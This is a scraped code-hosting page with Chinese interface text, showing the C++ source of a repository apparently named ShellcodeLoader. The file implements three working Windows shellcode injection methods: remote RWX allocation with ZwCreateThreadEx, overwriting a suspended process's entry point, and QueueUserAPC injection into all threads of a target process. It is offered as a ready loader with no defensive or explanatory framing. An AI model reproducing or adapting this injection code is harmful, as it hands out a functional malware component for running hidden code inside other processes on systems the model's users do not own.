同步操作将从 Rog/ShellcodeLoader 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
#include "CodeInject.h"//#include "CodeInject.h"BOOL CodeInject::ZwCreateThreadExCodeInject(DWORD dwPid, CodeBuffer Buffer){HANDLE hProcess = NULL;HANDLE hRemoteThread = NULL;PVOID pRemoteBuffer = NULL;BOOL bFlag = FALSE;//EnableDebugPriv(SE_DEBUG_NAME);hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);if (hProcess == NULL) //此处不用INVALID_HANDLE_VALUE,这是个历史遗留的大坑,何时用它判断句柄,要看对应函数的返回值{if (DEBUG){printf("OpenProcess Fail:%x\n", GetLastError());}return FALSE;}pRemoteBuffer = VirtualAllocEx(hProcess, NULL, Buffer.BufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!pRemoteBuffer){if (DEBUG){printf("VirtualAllocEx Fail:%x\n", GetLastError());}CloseHandle(hProcess);return FALSE;}bFlag = WriteProcessMemory(hProcess, pRemoteBuffer, Buffer.pBuffer, Buffer.BufferSize, NULL);if (!bFlag){if (DEBUG){printf("WriteProcessMemory Fail:%x\n", GetLastError());}CloseHandle(hProcess);return FALSE;}else if(DEBUG){printf("[*] ShellCode 加载地址 = 0x%p\n", pRemoteBuffer);}HMODULE hNtdll = NULL;hNtdll = GetModuleHandleA("ntdll.dll");//hNtdll = LoadLibraryA("ntdll.dll");if (!hNtdll){if (DEBUG){printf("GetNtdllModuleHandleA Fail:%x\n", GetLastError());}CloseHandle(hProcess);return FALSE;}#ifdef _WIN64typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle,ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,ULONG CreateThreadFlags,SIZE_T ZeroBits,SIZE_T StackSize,SIZE_T MaximumStackSize,LPVOID pUnkown);#elsetypedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle, //线程句柄ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle, //进程句柄LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,BOOL CreateSuspended,DWORD dwStackSize,DWORD dw1,DWORD dw2,LPVOID pUnkown);#endiftypedef_ZwCreateThreadEx ZwCreateThreadEx = NULL;ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");if (ZwCreateThreadEx == NULL){if (DEBUG){printf("GetZwCreateThreadExProcAddress Fail:%x\n", GetLastError());}CloseHandle(hProcess);return FALSE;}NTSTATUS ntStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, FALSE, 0, 0, 0, NULL);if (ntStatus < 0){if (DEBUG){printf("ZwCreateThreadEx Fail:%x\n", ntStatus);}CloseHandle(hProcess);return FALSE;}WaitForSingleObject(hRemoteThread, 1000);CloseHandle(hRemoteThread);CloseHandle(hProcess);return TRUE;}BOOL CodeInject::CreateProcessCodeInject(const WCHAR* pszTarget,CodeBuffer Buffer){STARTUPINFO start = { 0 };PROCESS_INFORMATION ProcessInfo = { 0 };start.cb = sizeof(STARTUPINFO);memset(&ProcessInfo, 0, sizeof(PROCESS_INFORMATION));if (!CreateProcessW(pszTarget,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&start,&ProcessInfo)){printf("CreateProcess Fail:%x\n", GetLastError());return 0;}//获取线程上下文 拿到进程入口点地址CONTEXT context;context.ContextFlags = CONTEXT_ALL;if (!GetThreadContext(ProcessInfo.hThread, &context)){printf("Get ThreadContext Fail:%x\n", GetLastError());TerminateProcess(ProcessInfo.hProcess, 0);return 0;}BOOL bFlag = FALSE;#ifdef _WIN64bFlag = WriteProcessMemory(ProcessInfo.hProcess, (LPVOID)context.Rax, Buffer.pBuffer, Buffer.BufferSize, 0);#elsebFlag = WriteProcessMemory(ProcessInfo.hProcess, (LPVOID)context.Eax, Buffer.pBuffer, Buffer.BufferSize, 0);#endif//写入shellcodeif (!bFlag){printf("Write Shellcode faild (%d). \n", GetLastError());TerminateProcess(ProcessInfo.hProcess, 0);return 0;}//恢复线程运行if (ResumeThread(ProcessInfo.hThread) == (DWORD)-1){printf("ResumeThread Fail:%x\n", GetLastError());TerminateProcess(ProcessInfo.hProcess, 0);return 0;}return TRUE;}BOOL GetAllThreadIdByProcessId(DWORD dwProcessId, DWORD** ppThreadId, DWORD* pdwThreadIdLength){DWORD* pThreadId = NULL;DWORD dwThreadIdLength = 0;DWORD dwBufferLength = 1000;THREADENTRY32 te32 = { 0 };HANDLE hSnapshot = NULL;BOOL bRet = TRUE;do{// 申请内存pThreadId = new DWORD[dwBufferLength];if (NULL == pThreadId){printf("new");bRet = FALSE;break;}::RtlZeroMemory(pThreadId, (dwBufferLength * sizeof(DWORD)));// 获取线程快照::RtlZeroMemory(&te32, sizeof(te32));te32.dwSize = sizeof(te32);hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);if (NULL == hSnapshot){printf("CreateToolhelp32Snapshot");bRet = FALSE;break;}// 获取第一条线程快照信息bRet = ::Thread32First(hSnapshot, &te32);while (bRet){// 获取进程对应的线程IDif (te32.th32OwnerProcessID == dwProcessId){pThreadId[dwThreadIdLength] = te32.th32ThreadID;dwThreadIdLength++;}// 遍历下一个线程快照信息bRet = ::Thread32Next(hSnapshot, &te32);}// 返回*ppThreadId = pThreadId;*pdwThreadIdLength = dwThreadIdLength;bRet = TRUE;} while (FALSE);if (FALSE == bRet){if (pThreadId){delete[]pThreadId;pThreadId = NULL;}}return bRet;}BOOL CodeInject::QueueUserAPCCodeInject(DWORD dwPid, CodeBuffer Buffer){BOOL bRet = FALSE;DWORD* pThreadId = NULL;DWORD dwThreadIdLength = 0;HANDLE hProcess = NULL, hThread = NULL;PVOID pRemoteBuffer = NULL;SIZE_T dwRet = 0;DWORD i = 0;bRet = GetAllThreadIdByProcessId(dwPid, &pThreadId, &dwThreadIdLength);if (FALSE == bRet){return FALSE;}hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);if (NULL == hProcess){printf("OpenProcess");return FALSE;}// 在注入进程空间申请内存pRemoteBuffer = ::VirtualAllocEx(hProcess, NULL, Buffer.BufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (pRemoteBuffer == NULL){printf("VirtualAllocEx");return FALSE;}// 向申请的空间中写入ShellcodeWriteProcessMemory(hProcess, pRemoteBuffer, Buffer.pBuffer, Buffer.BufferSize, &dwRet);if (dwRet != Buffer.BufferSize){printf("WriteProcessMemory");return FALSE;}// 遍历线程, 插入APCfor (i = 0; i < dwThreadIdLength; i++){// 打开线程hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);if (hThread){// 插入APC::QueueUserAPC((PAPCFUNC)pRemoteBuffer, hThread, (ULONG_PTR)pRemoteBuffer);// 关闭线程句柄::CloseHandle(hThread);hThread = NULL;}}if (hProcess){::CloseHandle(hProcess);hProcess = NULL;}if (pThreadId){delete[]pThreadId;pThreadId = NULL;}return TRUE;}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。